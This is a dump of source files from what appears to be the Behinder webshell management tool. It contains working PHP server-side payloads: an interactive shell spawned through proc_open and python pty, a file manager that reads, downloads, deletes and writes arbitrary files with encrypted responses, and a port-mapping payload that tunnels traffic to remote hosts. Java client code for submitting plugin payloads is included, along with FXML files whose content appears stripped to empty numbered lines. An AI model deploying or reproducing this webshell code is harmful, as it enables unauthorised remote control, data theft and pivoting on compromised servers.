92 | $process = proc_open($bashPath, $descriptorspec, $pipes);
93 |
94 | if (! is_resource($process)) {
95 | exit(1);
96 | }
97 |
98 | stream_set_blocking($pipes[0], 0);
99 |
100 | if ($win) {
101 | $reader = fopen($outputfile, "r+");
102 | $error = fopen($errorfile, "r+");
103 | } else {
104 | stream_set_blocking($pipes[1], 0);
105 | stream_set_blocking($pipes[2], 0);
106 | $reader = $pipes[1];
107 | $error = $pipes[2];
108 | }
109 |
110 | @session_start();
111 | $_SESSION["run"] = true;
112 | session_write_close();
113 | /*
114 | ob_end_clean();
115 | header("Connection: close");
116 | ignore_user_abort();
117 | ob_start();
118 | echo str_pad('',129);
119 | $size = ob_get_length();
120 | header("Content-Length: $size");
121 | ob_flush();
122 | ob_end_flush();
123 | flush();
124 | */
125 | if (! $win) {
126 | fwrite($pipes[0], sprintf("python -c 'import pty; pty.spawn(\"%s\")'\n", $bashPath));
127 | fflush($pipes[0]);
128 | }
129 |
130 | sleep(1);
131 | $idle=0;
132 | while ($_SESSION["run"] and $idle<1000000) {
133 | @session_start();
134 | @$writeBuffer = $_SESSION["writeBuffer"];
135 | session_write_close();
136 | if (strlen($writeBuffer) > 0) {
137 | fwrite($pipes[0], $writeBuffer);
138 | fflush($pipes[0]);
139 |
140 | session_start();
141 | $_SESSION["writeBuffer"] = "";
142 | session_write_close();
143 | $idle=0;
144 | }
145 | else
146 | {
147 | $idle=$idle+1;
148 | }
149 | while (($output = fread($reader, 10240)) != false) {
150 | /* if ($win)
151 | {
152 | fseek($reader, strlen($output));
153 | }*/
154 | if (!function_exists("mb_convert_encoding"))
155 | {
156 | $output=getSafeStr($output);
157 | }
158 | else
159 | {
160 | $output=mb_convert_encoding($output, 'UTF-8', mb_detect_encoding($output, "UTF-8,GBK"));
161 | }
162 | @session_start();
163 | $_SESSION["readBuffer"] = $_SESSION["readBuffer"] . $output;
164 | session_write_close();
165 | }
166 | if ($win)
167 | ftruncate($reader, 0);
168 | while (($errput = fread($error, 10240)) != false) {
169 |
170 | /*if ($win)
171 | {
172 | fseek($error, strlen($errput));
173 | }*/
174 |
175 | if (!function_exists("mb_convert_encoding"))
176 | {
177 | $errput=getSafeStr($errput);
178 | }
179 | else
180 | {
181 | $errput=mb_convert_encoding($errput, 'UTF-8', mb_detect_encoding($errput, "UTF-8,GBK"));
182 | }
183 | @session_start();
184 | $_SESSION["writeBuffer"]="\n";
185 | $_SESSION["readBuffer"] = $_SESSION["readBuffer"] . $errput;
186 | session_write_close();
187 | }
188 | if ($win)
189 | ftruncate($error, 0);
190 | sleep(0.8);
191 | }
192 | fclose($reader);
193 | fclose($error);
194 | unset($_SESSION["readBuffer"]);
195 | if ($win)
196 | {
197 | unlink($outputfile);
198 | unlink($errorfile);
199 | }
200 |
201 | }
202 |
203 | function encrypt($data,$key)
204 | {
205 | if(!extension_loaded('openssl'))
206 | {
207 | for($i=0;$i base64_encode($fileName),
57 | "size" => base64_encode(filesize($fullPath)),
58 | "lastModified" => base64_encode(date("Y-m-d H:i:s", filemtime($fullPath)))
59 | );
60 | $obj["perm"] = is_readable($fullPath) . "," . is_writable($fullPath) . "," . is_executable($fullPath);
61 | if (is_file($fullPath)) {
62 | $obj["type"] = base64_encode("file");
63 | } else {
64 | $obj["type"] = base64_encode("directory");
65 | }
66 | array_push($objArr, $obj);
67 | }
68 | $result["status"] = base64_encode("success");
69 | $result["msg"] = base64_encode(json_encode($objArr));
70 | echo encrypt(json_encode($result), $_SESSION['k']);
71 | break;
72 | case "show":
73 | $contents = file_get_contents($path);
74 | $result["status"] = base64_encode("success");
75 | if (function_exists("mb_convert_encoding"))
76 | {
77 | if ($charset=="")
78 | {
79 | $charset = mb_detect_encoding($contents, array(
80 | 'GB2312',
81 | 'GBK',
82 | 'UTF-16',
83 | 'UCS-2',
84 | 'UTF-8',
85 | 'BIG5',
86 | 'ASCII'
87 | ));
88 | }
89 | $result["msg"] = base64_encode(mb_convert_encoding($contents, "UTF-8", $charset));
90 | }
91 | else
92 | {
93 | if ($charset=="")
94 | {
95 | $result["msg"] = base64_encode(getSafeStr($contents));
96 | }
97 | else
98 | {
99 | $result["msg"] = base64_encode(iconv($charset, 'utf-8//IGNORE', $contents));
100 | }
101 |
102 | }
103 | $result = encrypt(json_encode($result),$_SESSION['k']);
104 | echo $result;
105 | break;
106 | case "download":
107 | if (! file_exists($path)) {
108 | header('HTTP/1.1 404 NOT FOUND');
109 | } else {
110 | $file = fopen($path, "rb");
111 | echo fread($file, filesize($path));
112 | fclose($file);
113 | }
114 | break;
115 | case "delete":
116 | if (is_file($path)) {
117 | if (unlink($path)) {
118 | $result["status"] = base64_encode("success");
119 | $result["msg"] = base64_encode($path . "删除成功");
120 | } else {
121 | $result["status"] = base64_encode("fail");
122 | $result["msg"] = base64_encode($path . "删除失败");
123 | }
124 | }
125 | if (is_dir($path)) {
126 | delDir($path);
127 | $result["status"] = base64_encode("success");
128 | $result["msg"] = base64_encode($path."删除成功");
129 | }
130 | echo encrypt(json_encode($result),$_SESSION['k']);
131 | break;
132 | case "create":
133 | $file = fopen($path, "w");
134 | $content = base64_decode($content);
135 | fwrite($file, $content);
136 | fflush($file);
137 | fclose($file);
138 | if (file_exists($path) && filesize($path) == strlen($content)) {
139 | $result["status"] = base64_encode("success");
140 | $result["msg"] = base64_encode($path . "上传完成,远程文件大小:" . $path . filesize($path));
141 | } else {
142 | $result["status"] = base64_encode("fail");
143 | $result["msg"] = base64_encode($path . "上传失败");
144 | }
145 | echo encrypt(json_encode($result), $_SESSION['k']);
146 | break;
147 | case "append":
148 | $file = fopen($path, "a+");
149 | $content = base64_decode($content);
150 | fwrite($file, $content);
151 | fclose($file);
152 | $result["status"] = base64_encode("success");
153 | $result["msg"] = base64_encode($path . "追加完成,远程文件大小:" . $path . filesize($path));
154 | echo encrypt(json_encode($result),$_SESSION['k']);
155 | break;
156 | case "rename":
157 | if (rename($path,$newpath)) {
158 | $result["status"] = base64_encode("success");
159 | $result["msg"] = base64_encode("重命名完成:" . $newpath);
160 | } else {
161 | $result["status"] = base64_encode("fail");
162 | $result["msg"] = base64_encode($path . "重命名失败");
163 | }
164 | echo encrypt(json_encode($result), $_SESSION['k']);
165 | break;
166 | default:
167 | break;
168 | }
169 | }
170 |
171 | function encrypt($data,$key)
172 | {
173 | if(!extension_loaded('openssl'))
174 | {
175 | for($i=0;$i {
50 | try {
51 | JSONObject resultObj = this.currentShellService.submitPluginTask(pluginName, payloadPath, params);
52 | String status = resultObj.getString("status");
53 | String msg = resultObj.getString("msg");
54 | Platform.runLater(() -> {
55 | this.statusLabel.setText(msg);
56 | });
57 | } catch (Exception var7) {
58 | var7.printStackTrace();
59 | Platform.runLater(() -> {
60 | this.statusLabel.setText("插件运行失败");
61 | });
62 | }
63 |
64 | };
65 | Thread workThread = new Thread(runner);
66 | this.workList.add(workThread);
67 | workThread.start();
68 | }
69 |
70 | public void sendTaskBackground(String pluginName, Map params, PluginSubmitCallBack callBack) throws Exception {
71 | String type = this.shellEntity.getString("type");
72 | if (type.equals("jsp")) {
73 | type = "java";
74 | }
75 |
76 | String payloadPath = String.format("/Users/rebeyond/Documents/Behinder/plugin/%s/payload/%s.payload", pluginName, type);
77 | params.put("taskID", pluginName);
78 | Runnable runner = () -> {
79 | try {
80 | JSONObject resultObj = this.currentShellService.submitPluginTask(pluginName, payloadPath, params);
81 | String status = resultObj.getString("status");
82 | String msg = resultObj.getString("msg");
83 | callBack.onPluginSubmit(status, msg);
84 | } catch (Exception var8) {
85 | var8.printStackTrace();
86 | callBack.onPluginSubmit("fail", var8.getMessage());
87 | }
88 |
89 | };
90 | Thread workThread = new Thread(runner);
91 | this.workList.add(workThread);
92 | workThread.start();
93 | }
94 |
95 | public String queryTaskList() {
96 | String result = "";
97 | return result;
98 | }
99 |
100 | public String queryTask(String taskName) {
101 | String result = "";
102 | return result;
103 | }
104 |
105 | public void getTaskResult(String pluginName) {
106 | this.statusLabel.setText("正在刷新任务执行结果……");
107 | Runnable runner = () -> {
108 | try {
109 | JSONObject resultObj = this.currentShellService.getPluginTaskResult(pluginName);
110 | String status = resultObj.getString("status");
111 | String msg = resultObj.getString("msg");
112 | JSONObject msgObj = new JSONObject(msg);
113 | String pluginResult = new String(Base64.getDecoder().decode(msgObj.getString("result")), StandardCharsets.UTF_8);
114 | String pluginRunning = msgObj.getString("running");
115 | Platform.runLater(() -> {
116 | if (status.equals("success")) {
117 | this.statusLabel.setText("结果刷新成功");
118 |
119 | try {
120 | this.pluginWebview.getEngine().executeScript(String.format("onResult('%s','%s','%s')", status, pluginResult, pluginRunning));
121 | } catch (Exception var5) {
122 | this.statusLabel.setText("结果刷新成功,但是插件解析结果失败,请检查插件:" + var5.getMessage());
123 | }
124 | } else {
125 | this.statusLabel.setText("结果刷新失败");
126 | }
127 |
128 | });
129 | } catch (Exception var8) {
130 | var8.printStackTrace();
131 | Platform.runLater(() -> {
132 | this.statusLabel.setText("结果刷新失败:" + var8.getMessage());
133 | });
134 | }
135 |
136 | };
137 | Thread workThread = new Thread(runner);
138 | this.workList.add(workThread);
139 | workThread.start();
140 | }
141 |
142 | public void getTaskResultBackground(String pluginName, PluginResultCallBack callBack) {
143 | Runnable runner = () -> {
144 | String running = "true";
145 |
146 | try {
147 | while (running.equals("true")) {
148 | JSONObject resultObj = this.currentShellService.getPluginTaskResult(pluginName);
149 | String status = resultObj.getString("status");
150 | String msg = resultObj.getString("msg");
151 | JSONObject msgObj = new JSONObject(msg);
152 | String pluginResult = new String(Base64.getDecoder().decode(msgObj.getString("result")), StandardCharsets.UTF_8);
153 | String pluginRunning = msgObj.getString("running");
154 | running = pluginRunning;
155 | callBack.onPluginResult(status, pluginResult, pluginRunning);
156 | Thread.sleep(3000L);
157 | }
158 | } catch (Exception var10) {
159 | callBack.onPluginResult("fail", var10.getMessage(), "false");
160 | }
161 |
162 | };
163 | Thread workThread = new Thread(runner);
164 | this.workList.add(workThread);
165 | workThread.start();
166 | }
167 | }
168 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/ui/ParallelViewTab.fxml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
11 |
14 |
15 |
16 |
18 |
19 |
20 |
22 |
23 |
24 |
25 |
27 |
28 |
30 |
31 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
81 |
82 |
83 |
84 |
85 |
86 |
89 |
90 |
92 |
93 |
94 |
95 |
97 |
98 |
100 |
101 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/ui/ParallelViewTab.fxml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
11 |
14 |
15 |
16 |
18 |
19 |
20 |
22 |
23 |
24 |
25 |
27 |
28 |
30 |
31 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
81 |
82 |
83 |
84 |
85 |
86 |
89 |
90 |
92 |
93 |
94 |
95 |
97 |
98 |
100 |
101 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/ui/PluginViewTab.fxml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
11 |
14 |
15 |
17 |
18 |
20 |
21 |
22 |
24 |
26 |
27 |
28 |
29 |
30 |
31 |
35 |
36 |
37 |
38 |
40 |
41 |
42 |
44 |
45 |
46 |
48 |
49 |
50 |
51 |
53 |
54 |
55 |
56 |
58 |
60 |
61 |
62 |
63 |
64 |
66 |
67 |
68 |
69 |
70 |
72 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
111 |
116 |
117 |
118 |
119 |
120 |
121 |
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/ui/PluginViewTab.fxml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
11 |
14 |
15 |
17 |
18 |
20 |
21 |
22 |
24 |
26 |
27 |
28 |
29 |
30 |
31 |
35 |
36 |
37 |
38 |
40 |
41 |
42 |
44 |
45 |
46 |
48 |
49 |
50 |
51 |
53 |
54 |
55 |
56 |
58 |
60 |
61 |
62 |
63 |
64 |
66 |
67 |
68 |
69 |
70 |
72 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
111 |
116 |
117 |
118 |
119 |
120 |
121 |
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/payload/php/PortMap.php.bak:
--------------------------------------------------------------------------------
1 | @error_reporting(0);
2 | function main($action,$targetIP="",$targetPort="",$socketHash="",$remoteIP="",$remotePort="",$extraData="")
3 | {
4 | switch($action)
5 | {
6 | case "createRemote":
7 | $localSocket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
8 | if ($localSocket === false) {
9 | echo "\x37\x21\x49\x36Failed creating socket";
10 | return;
11 | }
12 | $res = @socket_connect($localSocket, $targetIP, $targetPort);
13 | if ($res === false) {
14 | echo "\x37\x21\x49\x36Failed connecting to target";
15 | return;
16 | }
17 | socket_set_nonblock($localSocket);
18 | @session_start();
19 | $localPort = 0;
20 | if (socket_getsockname($localSocket, $sourceIp, $localPort) === false) {
21 | $failReason = "socket_getsockname() failed: reason: " . socket_strerror(socket_last_error());
22 | }
23 | $localKey = "remote_local_" . $localPort . "_" . targetIP . "_" . targetPort;
24 | $_SESSION[$localKey] = $localSocket;
25 | $remoteSocket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
26 | if ($remoteSocket === false) {
27 | echo "\x37\x21\x49\x36Failed creating socket";
28 | return;
29 | }
30 | $res = @socket_connect($remoteSocket, $remoteIP, $remotePort);
31 | if ($res === false) {
32 | echo "\x37\x21\x49\x36Failed connecting to remoteSocket";
33 | return;
34 | }
35 | socket_set_nonblock($remoteSocket);
36 | $localPort = 0;
37 | if (socket_getsockname($remoteSocket, $sourceIp, $localPort) === false) {
38 | $failReason = "socket_getsockname() failed: reason: " . socket_strerror(socket_last_error());
39 | }
40 | $remoteKey = "remote_remote_" . $localPort . "_" . targetIP . "_" . targetPort;
41 | $_SESSION[$remoteKey] = $remoteSocket;
42 | while (true) {
43 | $localReadBuf = socket_read($localSocket, 10240);
44 | if ($localReadBuf === false) {
45 | //echo "\x37\x21\x49\x36Failed reading from localSocket";
46 |
47 |
48 | } else {
49 | $numOfRead = socket_write($remoteSocket, $localReadBuf, strlen($localReadBuf));
50 | if ($numOfRead === false) {
51 |
52 | }
53 | };
54 | $localWriteBuf = socket_read($remoteSocket, 10240);
55 | if ($localWriteBuf === false) {
56 |
57 | } else {
58 | $numOfWrite = socket_write($localSocket, $localWriteBuf, strlen($localWriteBuf));
59 | if ($numOfWrite === false) {
60 |
61 | }
62 | }
63 | }
64 | break;
65 | case "createLocal":
66 | $localSocket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
67 | if ($localSocket === false) {
68 | echo "\x37\x21\x49\x36Failed creating socket";
69 | return;
70 | }
71 | $res = @socket_connect($localSocket, $targetIP, $targetPort);
72 | if ($res === false) {
73 | echo "\x37\x21\x49\x36Failed connecting to target".$targetIP.":".$targetPort;
74 | return;
75 | }
76 | socket_set_nonblock($localSocket);
77 | @session_start();
78 | $_SESSION["local_running"] = true;
79 | $_SESSION["writebuf"] = "";
80 | $_SESSION["readbuf"] = "";
81 | ob_end_clean();
82 | header("Connection: close");
83 | ignore_user_abort();
84 | ob_start();
85 | $size = ob_get_length();
86 | header("Content-Length: $size");
87 | ob_end_flush();
88 | flush();
89 | session_write_close();
90 |
91 | while ($_SESSION["local_running"])
92 | {
93 | $readBuff = "";
94 | @session_start();
95 | $writeBuff = $_SESSION["writebuf"];
96 | $_SESSION["writebuf"] = "";
97 | session_write_close();
98 | if ($writeBuff != "")
99 | {
100 | $i = socket_write($localSocket, $writeBuff, strlen($writeBuff));
101 | if($i === false)
102 | {
103 | @session_start();
104 | $_SESSION["run"] = false;
105 | session_write_close();
106 | echo "\x37\x21\x49\x36Failed writing socket";
107 | }
108 | }
109 | while ($o = socket_read($localSocket, 512)) {
110 | if($o === false)
111 | {
112 | @session_start();
113 | $_SESSION["local_running"] = false;
114 | session_write_close();
115 | echo "\x37\x21\x49\x36Failed reading from socket";
116 | }
117 | $readBuff .= $o;
118 | }
119 | if ($readBuff!=""){
120 | @session_start();
121 | $_SESSION["readbuf"] .= $readBuff;
122 | session_write_close();
123 | }
124 | #sleep(0.2);
125 | }
126 | socket_close($localSocket);
127 | break;
128 | case "read":
129 | @session_start();
130 | $readBuffer = $_SESSION["readbuf"];
131 | $_SESSION["readbuf"]="";
132 | $running = $_SESSION["local_running"];
133 | session_write_close();
134 | if ($running) {
135 | header("Connection: Keep-Alive");
136 | echo $readBuffer;
137 | return;
138 | } else {
139 | echo "\x37\x21\x49\x36RemoteSocket read filed";
140 | return;
141 | }
142 | break;
143 | case "write":
144 | {
145 | @session_start();
146 | $running = $_SESSION["local_running"];
147 | session_write_close();
148 | if(!$running){
149 | echo "\x37\x21\x49\x36No more running, close now";
150 | return;
151 | }
152 | header('Content-Type: application/octet-stream');
153 | $rawPostData = base64_decode($extraData);
154 | if ($rawPostData) {
155 | @session_start();
156 | $_SESSION["writebuf"] .= $rawPostData;
157 | session_write_close();
158 | header("Connection: Keep-Alive");
159 | return;
160 | } else {
161 | echo "\x37\x21\x49\x36POST request read filed";
162 | }
163 | }
164 | break;
165 | case "closeLocal":
166 | @session_start();
167 | $running = $_SESSION["local_running"]=false;
168 | break;
169 | }
170 |
171 | }
--------------------------------------------------------------------------------